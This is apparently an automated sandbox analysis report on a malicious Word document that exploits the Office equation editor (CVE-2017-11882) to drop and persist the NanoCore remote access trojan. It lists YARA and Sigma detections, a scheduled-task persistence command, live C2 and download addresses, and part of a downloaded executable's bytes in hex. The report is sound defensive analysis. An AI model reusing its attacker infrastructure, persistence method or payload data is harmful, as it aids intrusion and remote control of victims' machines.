26.2.smtpsvc.exe.400000.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
26.2.smtpsvc.exe.400000.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
26.2.smtpsvc.exe.400000.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
7.2.JNM.exe.630000.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
7.2.JNM.exe.630000.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
7.2.JNM.exe.630000.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
23.2.JNM.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
23.2.JNM.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
23.2.JNM.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
23.2.JNM.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
Click to see the 15 entries

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\JNM.exe, CommandLine: C:\Users\user\AppData\Roaming\JNM.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\JNM.exe, NewProcessName: C:\Users\user\AppData\Roaming\JNM.exe, OriginalFileName: C:\Users\user\AppData\Roaming\JNM.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2424, ProcessCommandLine: C:\Users\user\AppData\Roaming\JNM.exe, ProcessId: 1692

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 84.38.135.158, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2424, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2424, TargetFilename: C:\Users\user\AppData\Roaming\JNM.exe

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\JNM.exe, ProcessId: 2304, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp', CommandLine: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp', CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\JNM.exe, ParentImage: C:\Users\user\AppData\Roaming\JNM.exe, ParentProcessId: 2304, ProcessCommandLine: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp', ProcessId: 2808

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: JNM.exe.2304.7.memstr

Malware Configuration Extractor: NanoCore {"C2: ": ["46.243.219.32"], "Version: ": "NanoCore Client, Version=1.2.2.0"}

Multi AV Scanner detection for domain / URL

Show sources

Source: manojvashanava234.sytes.net	Virustotal: Detection: 10%			Perma Link
Source: http://manojvashanava234.sytes.net/WAH.exe	Virustotal: Detection: 9%			Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Roaming\JNM.exe	ReversingLabs: Detection: 34%

Multi AV Scanner detection for submitted file

Show sources

Source: Statement.doc	Virustotal: Detection: 45%			Perma Link
Source: Statement.doc	ReversingLabs: Detection: 58%

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2357133398.0000000002501000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JNM.exe PID: 1692, type: MEMORY
Source: Yara match	File source: Process Memory Space: JNM.exe PID: 2304, type: MEMORY
Source: Yara match	File source: Process Memory Space: JNM.exe PID: 2360, type: MEMORY
Source: Yara match	File source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.JNM.exe.630000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.JNM.exe.630000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\JNM.exe	Joe Sandbox ML: detected

Source: 7.2.JNM.exe.630000.3.unpack

Avira: Label: TR/NanoCore.fadte

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\user\AppData\Roaming\JNM.exe

Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Binary contains paths to debug symbols

Show sources

Source:	Binary string: Pinaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: JNM.exe, 00000003.00000002.2356181917.00000000004D6000.00000004.00000020.sdmp
Source:	Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4JNM.PDB-F424491E3931}\Servererver32 source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
Source:	Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4JNM.PDB-F424491E3931}\Servererver32h source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
Source:	Binary string: MC:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbicddH?X source: JNM.exe, 00000003.00000002.2356207673.00000000004FA000.00000004.00000020.sdmp
Source:	Binary string: 8inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmp
Source:	Binary string: >vbpC:\Users\user\AppData\Roaming\JNM.PDBBPJQ source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
Source:	Binary string: 8(P5jLC:\Windows\Microsoft.VisualBasic.pdb source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
Source:	Binary string: Qsers\user\AppData\Roaming\JNM.exeVisualBasic.pdb*n source: JNM.exe, 00000003.00000002.2356207673.00000000004FA000.00000004.00000020.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Roaming\JNM.PDB source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\user\AppData\Roaming\JNM.exe77-1006j_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdb source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp, JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
Source:	Binary string: QC:\Users\user\AppData\Roaming\JNM.PDB source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
Source:	Binary string: M.PDBr source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmp
Source:	Binary string: (P5jLC:\Windows\Microsoft.VisualBasic.pdb source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
Source:	Binary string: ,:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmp
Source:	Binary string: )vbpC:\Users\user\AppData\Roaming\JNM.PDB.x source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
Source:	Binary string: :\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: JNM.exe, 00000003.00000002.2366184294.0000000006EF0000.00000004.00000001.sdmp

Software Vulnerabilities:

Source: global traffic

DNS query: name: manojvashanava234.sytes.net

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 84.38.135.158:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 84.38.135.158:80

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

IPs: 46.243.219.32

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 46.243.219.32:2420

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 27 Jan 2021 18:12:25 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.1Last-Modified: Wed, 27 Jan 2021 18:12:25 GMTETag: W/"1e1e00-5b9e73c7fac88"Accept-Ranges: bytesContent-Length: 1973760Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 02 00 e7 39 11 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1a 1e 00 00 02 00 00 00 00 00 00 5e 38 1e 00 00 20 00 00 00 40 1e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 1e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 38 1e 00 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 1e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 18 1e 00 00 20 00 00 00 1a 1e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 1e 00 00 02 00 00 00 1c 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 38 1e 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 52 00 00 60 e5 1d 00 03 00 00 00 94 01 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 1a 20 00 00 00 00 2a fa fe 09 01 00 39 30 00 00 00 28 95 01 00 06 39 18 00 00 00 fe 09 00 00 72 60 02 1d 70 fe 09 01 00 28 43 00 00 0a 28 44 00 00 0a 2a fe 09 00 00 fe 09 01 00 28 45 00 00 0a 2a fe 09 00 00 2a 2a fe 09 00 00 28 5f 00 00 0a 2a 00 13 30 01 00 5f 08 00 00 00 00 00 00 28 93 01 00 06 28 92 01 00 06 28 91 01 00 06 28 90 01 00 06 28 8f 01 00 06 28 8e 01 00 06 28 8d 01 00 06 28 8c 01 00 06 28 8b 01 00 06 28 8a 01 00 06 28 89 01 00 06 fe 06 01 00 00 0a 80 87 01 00 04 28 88 01 00 06 28 87 01 00 06 28 86 01 00 06 fe 06 02 00 00 0a 80 86 01 00 04 28 85 01 00 06 28 84 01 00 06 28 83 01 00 06 fe 06 03 00 00 0a 80 85 01 00 04 28 82 01 00 06 28 81 01 00 06 28 80 01 00 06 28 7f 01 00 06 28 7e 01 00 06 28 7d 01 00 06 28 7c 01 00 06 28 7b 01 00 06 28 7a 01 00 06 28 79 01 00 06 28 78 01 00 06 28 77 01 00 06 28 76 01 00 06 28 75 01 00 06 28 74 01 00 06 28 73 01 00 06 2

Source: global traffic

HTTP traffic detected: GET /WAH.exe HTTP/1.1Connection: Keep-AliveHost: manojvashanava234.sytes.net

Source: Joe Sandbox View

ASN Name: DATACLUBLV DATACLUBLV

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{55454834-8E09-401E-A760-1A1C7B299BE3}.tmp

Jump to behavior

Source: global traffic

HTTP traffic detected: GET /WAH.exe HTTP/1.1Connection: Keep-AliveHost: manojvashanava234.sytes.net

Source: unknown

DNS traffic detected: queries for: manojvashanava234.sytes.net

Source: JNM.exe, 00000003.00000002.2364935179.0000000006420000.00000002.00000001.sdmp, JNM.exe, 00000007.00000002.2361274784.0000000005760000.00000002.00000001.sdmp, taskeng.exe, 0000000D.00000002.2356083438.0000000001BE0000.00000002.00000001.sdmp, JNM.exe, 0000000F.00000002.2363821875.00000000064C0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: JNM.exe, 00000003.00000002.2364935179.0000000006420000.00000002.00000001.sdmp, JNM.exe, 00000007.00000002.2361274784.0000000005760000.00000002.00000001.sdmp, taskeng.exe, 0000000D.00000002.2356083438.0000000001BE0000.00000002.00000001.sdmp, JNM.exe, 0000000F.00000002.2363821875.00000000064C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: JNM.exe, 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2357133398.0000000002501000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JNM.exe PID: 1692, type: MEMORY
Source: Yara match	File source: Process Memory Space: JNM.exe PID: 2304, type: MEMORY
Source: Yara match	File source: Process Memory Space: JNM.exe PID: 2360, type: MEMORY
Source: Yara match	File source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.JNM.exe.630000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.JNM.exe.630000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.2356337271.0000000000620000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: JNM.exe PID: 1692, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: JNM.exe PID: 1692, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: JNM.exe PID: 2304, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: JNM.exe PID: 2304, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: JNM.exe PID: 2360, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: JNM.exe PID: 2360, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.JNM.exe.620000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.JNM.exe.630000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.JNM.exe.630000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Roaming\JNM.exe

Jump to dropped file

Source: C:\Users\user\AppData\Roaming\JNM.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\JNM.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\JNM.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\JNM.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\JNM.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\JNM.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\JNM.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\JNM.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 3_2_00400AC4 NtSetInformationThread,
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 3_2_00408E03 NtSetInformationThread,
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 15_2_00450AC4 NtSetInformationThread,
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 15_2_00458DE5 NtSetInformationThread,
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 16_2_003B0AC4 NtSetInformationThread,
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 16_2_003B8E03 NtSetInformationThread,

Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 3_2_00404BE8
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 3_2_00404881
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 7_2_0044E038
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 7_2_0044C0B0
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 7_2_004443A0
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 7_2_0044B498
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 7_2_00443788
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 7_2_0044C16E
